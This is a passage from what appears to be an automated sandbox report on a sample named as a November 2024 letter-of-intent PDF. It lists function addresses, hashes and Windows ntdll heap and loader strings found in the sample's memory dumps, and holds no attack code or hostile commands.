                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      • Opcode ID: 5926b4c4866a63fb422ae480e2a757ccd42447d8205c721d6fa0999b8684fa45
                                                                                      • Instruction ID: b1532065dff85d8a5ff46f116b82a8185b3d4e35621fa8e62db393ca709ce736
                                                                                      • Opcode Fuzzy Hash: 5926b4c4866a63fb422ae480e2a757ccd42447d8205c721d6fa0999b8684fa45
                                                                                      • Instruction Fuzzy Hash: 53C15875A10355ABEB148F64C8A0BBE77A5EF55708F144CAAEF01AB290DFB4CC44CB90
                                                                                      Function 32FA0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-4253913091
                                                                                      • Opcode ID: e0e8d523f5b7e06358cf32dbf22d44d2ae0a88a60544d9ae958cfe2d14b090d7
                                                                                      • Instruction ID: 5d7d6c7ddfbc4455fbe0b4451c19a81cf453f522a5b52abd2af20354a814572b
                                                                                      • Opcode Fuzzy Hash: e0e8d523f5b7e06358cf32dbf22d44d2ae0a88a60544d9ae958cfe2d14b090d7
                                                                                      • Instruction Fuzzy Hash: 23F1AB75B00605EFE704CF68D8A0B6AB7B5FF45744F108AA8EA059B791DB31E981CF90
                                                                                      Function 32FBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 330002E7
                                                                                      • RTL: Re-Waiting, xrefs: 3300031E
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 330002BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      • Opcode ID: 832a38b14b04ba8c75aed09f798387cc54e7579df709ff20d2c513963ced1ecd
                                                                                      • Instruction ID: bb2bd9f6bd140dd4388c79f0771858ef811e6c157c3583da24c8df0ab9d54fe4
                                                                                      • Opcode Fuzzy Hash: 832a38b14b04ba8c75aed09f798387cc54e7579df709ff20d2c513963ced1ecd
                                                                                      • Instruction Fuzzy Hash: 8CE1D0756047419FEB15CF69C980B0AB7E1BF84314F240BADF6A48B6D1DB74D844CB42
                                                                                      Function 32FB51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • WindowsExcludedProcs, xrefs: 32FB522A
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 32FB5247
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 32FB527B
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 32FB542B
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 32FB5352
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      • Opcode ID: 028e9e2b7c1b97c1f0d665ddf35f6bcb7b9dfeb06c58ae4c79e89a98fe48e36c
                                                                                      • Instruction ID: 6682e3144187d56238b4f841aebf54cd67cc1bc048544a6ad829010eb640e179
                                                                                      • Opcode Fuzzy Hash: 028e9e2b7c1b97c1f0d665ddf35f6bcb7b9dfeb06c58ae4c79e89a98fe48e36c
                                                                                      • Instruction Fuzzy Hash: 99F15BB6D10219EFDF05DF99C990AEEBBF9EF08754F54085AE601E7210DA749E01CBA0
                                                                                      Function 3306B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 43e612422e513a36cb3e02a6752ab608d4dd5b3dc2ad4813cde33acd26fcafc5
                                                                                      • Instruction ID: f65c201ee51eb02c3904097b6d60dcd87100c0b4eb12eeb4e62784b90f598aef
                                                                                      • Opcode Fuzzy Hash: 43e612422e513a36cb3e02a6752ab608d4dd5b3dc2ad4813cde33acd26fcafc5
                                                                                      • Instruction Fuzzy Hash: E8F129B6F006118FDB08DF6AC9A067DFBF5EF8820475941ADD496DB384E674EA01CB90
                                                                                      Function 32F876B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                      • API String ID: 0-3061284088
                                                                                      • Opcode ID: 91bd58760ae70b61a6b8bd05d7cfde368ee7221854d17d54e5d3b2c3eed55272
                                                                                      • Instruction ID: 05ad7adc03e696181e028fa64ce1fa88182b6191674e1b8d560f1624227ca1eb
                                                                                      • Opcode Fuzzy Hash: 91bd58760ae70b61a6b8bd05d7cfde368ee7221854d17d54e5d3b2c3eed55272
                                                                                      • Instruction Fuzzy Hash: 02012B37115290DEF31A9B28D419F66BBD4FB42B74F244CD9E3119B661CEF8AC80CA64
                                                                                      Function 32FA70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 464bdbf0a3d1a8da412514f65e798db841d5a7638de22fef643222a8302f043b
                                                                                      • Instruction ID: 28ad189ed93ebaf04cfd9aa833cf85b85dc7ee93adc54d1efe33d0a04eadf12e
                                                                                      • Opcode Fuzzy Hash: 464bdbf0a3d1a8da412514f65e798db841d5a7638de22fef643222a8302f043b
                                                                                      • Instruction Fuzzy Hash: 35139E74A00355DFEB18CF68C4A0BADBBF1BF49304F1489A9DA45AB381DB74A945CF90
                                                                                      Function 32F8F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 0-2586055223
                                                                                      • Opcode ID: ed3b931160b6fb062e100cc2ea13ef96957831bfa401bb07819cda2b3a31f1db
                                                                                      • Instruction ID: 88959aa409884d1e4c741b6c97280f2c9773bf1f97c4d291ed55cc86e5a45319
                                                                                      • Opcode Fuzzy Hash: ed3b931160b6fb062e100cc2ea13ef96957831bfa401bb07819cda2b3a31f1db
                                                                                      • Instruction Fuzzy Hash: EE612376204384AFE312CB64D954F67B7E8EF84768F040E68FB558B291DB74D900CBA1
                                                                                      Function 330411A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                      • API String ID: 0-336120773
                                                                                      • Opcode ID: babf4d6d874c73fdd598d03032f5503bd8698bf341bc596dcdc176a1440ac110
                                                                                      • Instruction ID: a15bd67d293536421e903292de6121164ef4ee71cd91b120066ee72cc05b00c7
                                                                                      • Opcode Fuzzy Hash: babf4d6d874c73fdd598d03032f5503bd8698bf341bc596dcdc176a1440ac110
                                                                                      • Instruction Fuzzy Hash: 37310735200210EFE704DB99C984FAAB3E9EF04764F5408E5F691DB2A0D670EE50CF55
                                                                                      Function 32F89148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      • Opcode ID: 251651784afb1b697cfbf2e1ddf21c790e3e07677f171d17d8d0cbbe7e552000
                                                                                      • Instruction ID: dd7c11defcc6b07231695ef7ec017625a8b2f3238b9a7284c0648fb42d2d9b85
                                                                                      • Opcode Fuzzy Hash: 251651784afb1b697cfbf2e1ddf21c790e3e07677f171d17d8d0cbbe7e552000
                                                                                      • Instruction Fuzzy Hash: 0A31A436601614EFEB02CF55CC84FAAB7B8FF45B64F1448A5EA15A7291DB70DD40CA60
                                                                                      Function 32F97152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 0ab933d613510c26ba0f0b64343b6ea7cd3595f8dd44feebf0643bdc16738772
                                                                                      • Instruction ID: 4c2792d679b93b1d3ead5d06cb6b331407f2f6ba34b9af1e33f31f9f11a7d97c
                                                                                      • Opcode Fuzzy Hash: 0ab933d613510c26ba0f0b64343b6ea7cd3595f8dd44feebf0643bdc16738772
                                                                                      • Instruction Fuzzy Hash: 8B5136B6A04709EFFB09DF64C944B9EB7B0FF44754F104869EA06972A0DBB09941CF80
                                                                                      Function 33023A78 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      • API String ID: 0-1168191160
                                                                                      • Opcode ID: 31bcd0fff3ffc18fe49600bd3b0ae183bea4a88dd92d9dfa8c217aaa696bb08f
                                                                                      • Instruction ID: fad5e0578008eada7b0c9cf4fce2f878faba31711749931d933a5e243749d935
                                                                                      • Opcode Fuzzy Hash: 31bcd0fff3ffc18fe49600bd3b0ae183bea4a88dd92d9dfa8c217aaa696bb08f
                                                                                      • Instruction Fuzzy Hash: E5F17EB5A002288FDB21CF24CC90B99BBB5EF44744F5484EAEA09E7241EB719EC5CF54
                                                                                      Function 32F91460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32F91728
                                                                                      • HEAP[%wZ]: , xrefs: 32F91712
                                                                                      • HEAP: , xrefs: 32F91596
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 47f0a57b1865774cc9af9b44ec35e54f4855315c6a5fda16b4bf4c59e6a08bd0
                                                                                      • Instruction ID: 0c2ea913c221c9a89e535f20b593a67e42d3e10caecc6012b7b8c07c9588ae64
                                                                                      • Opcode Fuzzy Hash: 47f0a57b1865774cc9af9b44ec35e54f4855315c6a5fda16b4bf4c59e6a08bd0
                                                                                      • Instruction Fuzzy Hash: 92E10D75A043459FE719DF28C481BBBBBF1AF89744F148969EA968B241DB34E840CB50
                                                                                      Function 32F9BAA0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • {, xrefs: 32FF3ABD
                                                                                      • 'LDR: %s(), invalid image format of MUI file , xrefs: 32FF3AB4
                                                                                      • LdrpLoadResourceFromAlternativeModule, xrefs: 32FF3AAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                                      • API String ID: 0-1697150599
                                                                                      • Opcode ID: b89aa43c935dc689f2f26aaf3ac97d3d4541da7f052576e12568414e75feb02b
                                                                                      • Instruction ID: 640b96d289d493bb514cf3ffa1f30c55b010988a9fe7137fa870503126cb7791
                                                                                      • Opcode Fuzzy Hash: b89aa43c935dc689f2f26aaf3ac97d3d4541da7f052576e12568414e75feb02b
                                                                                      • Instruction Fuzzy Hash: A9E19B756083859BF318CF14C590BABB7E5AF84788F404D2DFA859B3A0DB71D945CB82
                                                                                      Function 32F9B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-1145731471
                                                                                      • Opcode ID: 10bf3990fdb78a6a4c9639baadb6af8e150a4928444a222f144219f7c7e2b14b
                                                                                      • Instruction ID: d5de652ce02935bc547749d9712eee72d4ed9ab8d764cd16d34678c032accb5d
                                                                                      • Opcode Fuzzy Hash: 10bf3990fdb78a6a4c9639baadb6af8e150a4928444a222f144219f7c7e2b14b
                                                                                      • Instruction Fuzzy Hash: 8DB1E076A05789AFEB15CF55C980F9DB7B2AF44748F144D69EA41EB390DB35D840CB00
                                                                                      Function 3301368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                      • API String ID: 0-2391371766
                                                                                      • Opcode ID: c84860b4ab60759d24ed8bb204e0791510f76b3b6a2be45d8f8476624f807ab7
                                                                                      • Instruction ID: a2819dec320d0e5e93690b5f14733ff7a9f9b92cca07efb19d89eb5ef0672cef
                                                                                      • Opcode Fuzzy Hash: c84860b4ab60759d24ed8bb204e0791510f76b3b6a2be45d8f8476624f807ab7
                                                                                      • Instruction Fuzzy Hash: FFB182BAA04345AFE311DF64C880B5BB7E8FB44754F4509A9FA80AB250D7B1E815CB92
                                                                                      Function 33033B60 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                                      • API String ID: 0-1146358195
                                                                                      • Opcode ID: 9f09f496c1bf122638765241930f9dd8f953f65749d5714dccfd68cfbfa75ab7
                                                                                      • Instruction ID: 64c01c1b44991f75aa349933d6ee2f0f0a752c5faa30dffcabdbd52f95aca389
                                                                                      • Opcode Fuzzy Hash: 9f09f496c1bf122638765241930f9dd8f953f65749d5714dccfd68cfbfa75ab7
                                                                                      • Instruction Fuzzy Hash: ADA18C71A0A3559FD311DF24C880B5BBBE8BF89B64F480DADBA849B250D770DD04CB92
                                                                                      Function 330236EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                      • API String ID: 0-318774311
                                                                                      • Opcode ID: b84ab57dbbd2439af830f6d6e6434a74387a56195cbb861bfa028651489960d7
                                                                                      • Instruction ID: 6a20d79a9277a6a6249215037c47066882fdaca1231684cff7e7e8d30ebacd07
                                                                                      • Opcode Fuzzy Hash: b84ab57dbbd2439af830f6d6e6434a74387a56195cbb861bfa028651489960d7
                                                                                      • Instruction Fuzzy Hash: F6817CB5608741AFE711CB25C840B6BBBE9EF85B90F4409A9FD80DB390DB74D904CB52
                                                                                      Function 33017410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                      • API String ID: 0-3870751728
                                                                                      • Opcode ID: f75c0f4c0d28542ab153ad060150ccf1df4a84ab84865b28d5122c73fe653757
                                                                                      • Instruction ID: 9b51759b6be2ef5589a31a61cdf936dba274c5ac1dc50693f6eca64fe77780b6
                                                                                      • Opcode Fuzzy Hash: f75c0f4c0d28542ab153ad060150ccf1df4a84ab84865b28d5122c73fe653757
                                                                                      • Instruction Fuzzy Hash: F2916DB8E003059FEB14CFA9C480B9DBBF1FF48704F1481AAE945AB291E7759852CF50
                                                                                      Function 32F9B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                      • API String ID: 0-373624363
